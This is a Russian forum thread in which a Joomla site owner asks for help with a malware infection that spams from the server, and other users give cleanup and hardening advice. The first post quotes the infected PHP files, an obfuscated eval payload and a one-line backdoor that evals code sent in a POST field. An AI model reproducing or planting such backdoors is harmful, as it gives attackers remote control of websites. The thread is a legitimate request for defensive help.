0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 1484 Просмотров
*

kanbodows

  • Новичок
  • 2
  • 0 / 0
Всем привет!

Имеется около 10ти сайтов на Joomla распложенных на одном сервере
Каждый из них за день забивается php файлами с вирусом PCT4BA6ODSE, который рассылает спам от нашего сервера и периодически захламляет сайт тучами ненужных файлов
В интернете кроме как предложения сделать readonly и сменить пароли ничего стоящего не предлагают
Чистка зараженных файлов и удаление новых созданных уже мягко говоря задолбала

Примеры создающихся файлов, которые появляются спонтанно, названия у них в основном в виде define.php или define + и двузначное число + .php, или include.php, help.php, cache.php и т.д.
Содержание в основном такого рода:

Код: php
<?php
function qoehwzxnn($rwks, $pbycg){$psnp = ''; for($i=0; $i < strlen($rwks); $i++){$psnp .= isset($pbycg[$rwks[$i]])? $pbycg[$rwks[$i]] : $rwks[$i];}
$ks="base64_decode";return $ks($psnp);}
$tdxprwhb = 'GrsKnj2Z04GHJEwFh6Azv4sB04JkQ6JZJkUUPWzPGrsKnj2Z04GHJEDR0c2sh9JRh9x97meFgUFe04JkQ6JBhojU'.
'Q6JtnC39PmeFgUFehEjt46wFQCjBQrsVn4GHxfqyfqAF0E3RhojBb4lshs2Tvo2kbf1DPWzPGrsKnj2Z04GHJEcTNu2sNrj'.
'Ob4wFQE3BbrsV0Ihzxfqyf1FF05eHbojkhEsRQs2OQEcUv4JsPuAdYu2CwjJWIY2g7fe9lIMU7Oe97fe9LfhFdfq1N'.
'UH1dfwk04x1LIAAh9JTNI1FgUH1dfwk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xmzPdfAsvETRdrJThEYElu2sQolR'.
'0rYHhEjknCuzn4FsPfwk04xFPWzPBGHP09jKv6wFQEM1v6jZbr2V46lthosU46wT06xHJXwsN'.
+еще тучу строк+
yf5wk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xWzPfojOnra1vouZ0Wvt4Ej'.
'KvE2q0ITZ04JFvCDFNoYHJXJshkqFgUHP04TFbf1FgU==';
$wtzvo = Array('1'=>'g', '0'=>'Z', '3'=>'5', '2'=>'9', '5'=>'i', '4'=>'X', '7'=>'L', '6'=>'3', '9'=>'n', '8'=>'r', 'A'=>'B', 'C'=>'W', 'B'=>'f', 'E'=>'2', 'D'=>'x', 'G'=>'Q', 'F'=>'p', 'I'=>'S', 'H'=>'o', 'K'=>'u', 'J'=>'J', 'M'=>'4', 'L'=>'P', 'O'=>'j', 'N'=>'e', 'Q'=>'b', 'P'=>'K', 'S'=>'6', 'R'=>'v', 'U'=>'w', 'T'=>'h', 'W'=>'T', 'V'=>'t', 'Y'=>'U', 'X'=>'H', 'Z'=>'z', 'a'=>'8', 'c'=>'1', 'b'=>'d', 'e'=>'A', 'd'=>'I', 'g'=>'O', 'f'=>'C', 'i'=>'q', 'h'=>'c', 'k'=>'y', 'j'=>'V', 'm'=>'D', 'l'=>'N', 'o'=>'m', 'n'=>'a', 'q'=>'k', 'p'=>'E', 's'=>'l', 'r'=>'G', 'u'=>'F', 't'=>'0', 'w'=>'R', 'v'=>'Y', 'y'=>'7', 'x'=>'M', 'z'=>'s');
eval(qoehwzxnn($tdxprwhb, $wtzvo));?>

или

Код: php
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf03c87'])) {eval($s21(${$s20}['nf03c87']));}?>

или такой же код только уже в существующих файлах в самом начале.

Англоязычные форумы говорят что это уязвимость каких то бесплатных плагинов или плагины со сладейром

Помогите пожалуйста кто чем может!!  ! ! !
Выложу всю необходимую инфу  :'( :'( :'(
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Взломали сеть сайтов на Joomla
« Ответ #1 : 17.09.2015, 09:54:47 »
Ищите бэкдор - скорее всего, он там есть. Прогоните сайт манулом или айболитом и ищите.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Взломали сеть сайтов на Joomla
« Ответ #2 : 17.09.2015, 10:26:50 »
На сервере под одним пользователем? Или под разными?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Взломали сеть сайтов на Joomla
« Ответ #3 : 17.09.2015, 11:24:14 »
А Версия Joomla ? проверить инфо о безопасности установленных сторонних расширений. А лучше  и проще для новичка- установить чистую Joomla + расширения и подключить старую базу данных
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сеть сайтов на Joomla
« Ответ #4 : 19.09.2015, 12:23:19 »
Нужно начинать профилактические меры с самого сервака, настройки файла php.ini, опен базе дир все под каждый сайт, каждый сайт разбить на отдельные учетные запеси, затем приступать к личению и профилактических мер самих сайтов!
*

resident82

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Re: Взломали сеть сайтов на Joomla
« Ответ #5 : 22.09.2015, 11:48:51 »
похожая проблема, десяток сайтов на разных версиях Joomla, все под одной учеткой по условиям хостинга. пока блочу все подозрительные айпишники и вручную периодически чищу.. думаю может создать еще одну учетку и туда их по одному перекидывать постепенно.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сеть сайтов на Joomla
« Ответ #6 : 22.09.2015, 12:43:29 »
похожая проблема, десяток сайтов на разных версиях Joomla, все под одной учеткой по условиям хостинга. пока блочу все подозрительные айпишники и вручную периодически чищу.. думаю может создать еще одну учетку и туда их по одному перекидывать постепенно.
На крайняк можно сделать и под одной учеткой, но риск из-за одного касяченного не грамотного сайта, пострадают все, можно конечно снизить риски за счет грамотно настроенных прав и профилактических мер, но тут 100% нужна правка php.ini, за тем не помешало бы снифер повесить на все сайты, тоже можно с помощью php.ini, взломщик будет пытаться востановить доступ через багу, там то и встанет все на свои места и соответствующий патч, минус решения задачи через снифер, то что громоздкие логи будут, когда много сайтов, вообщем решение есть всегда! Было бы время и желание...
*

resident82

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Re: Взломали сеть сайтов на Joomla
« Ответ #7 : 22.09.2015, 15:04:27 »
за тем не помешало бы снифер повесить на все сайты, тоже можно с помощью php.ini, взломщик будет пытаться востановить доступ через багу, там то и встанет все на свои места и соответствующий патч, минус решения задачи через снифер, то что громоздкие логи будут, когда много сайтов, вообщем решение есть всегда! Было бы время и желание...
снифер больше покажет чем логи хостинга?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сеть сайтов на Joomla
« Ответ #8 : 22.09.2015, 15:21:48 »
снифер больше покажет чем логи хостинга?
А это уже как вы захотите сделать, я какраз хотел подготовить статью для forum.antichat.ru, о том как реализовать подобный момент, там начиная от снифа header заголовков и зканчивая всем остольным, т.е один запрос может быть в полне весомым, в вашем случае достаточно будет POST,COOKIE, HEADER, Хостинг отслеживает только GET и REFERER ну и IP логично
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сеть сайтов на Joomla
« Ответ #9 : 23.09.2015, 00:25:36 »
снифер больше покажет чем логи хостинга?
Правильно написанный/настроенный покажет именно на проблему и в нем не будет лишнего, можно резать одинаковые строки для уменьшения объема и т.д.. Логи покажут, но в них меньше информации и они ведутся в обобщенно.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 922
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1099
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Изолирование папок сайтов на OpenServer

Автор Lemady

Ответов: 41
Просмотров: 5686
Последний ответ 29.11.2021, 15:47:31
от KoreshS
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 1366
Последний ответ 13.09.2021, 09:23:28
от Oleg+
Joomla 1.5 и 2.5 на одном хостинге

Автор andreU

Ответов: 28
Просмотров: 13105
Последний ответ 25.04.2021, 19:42:48
от rsn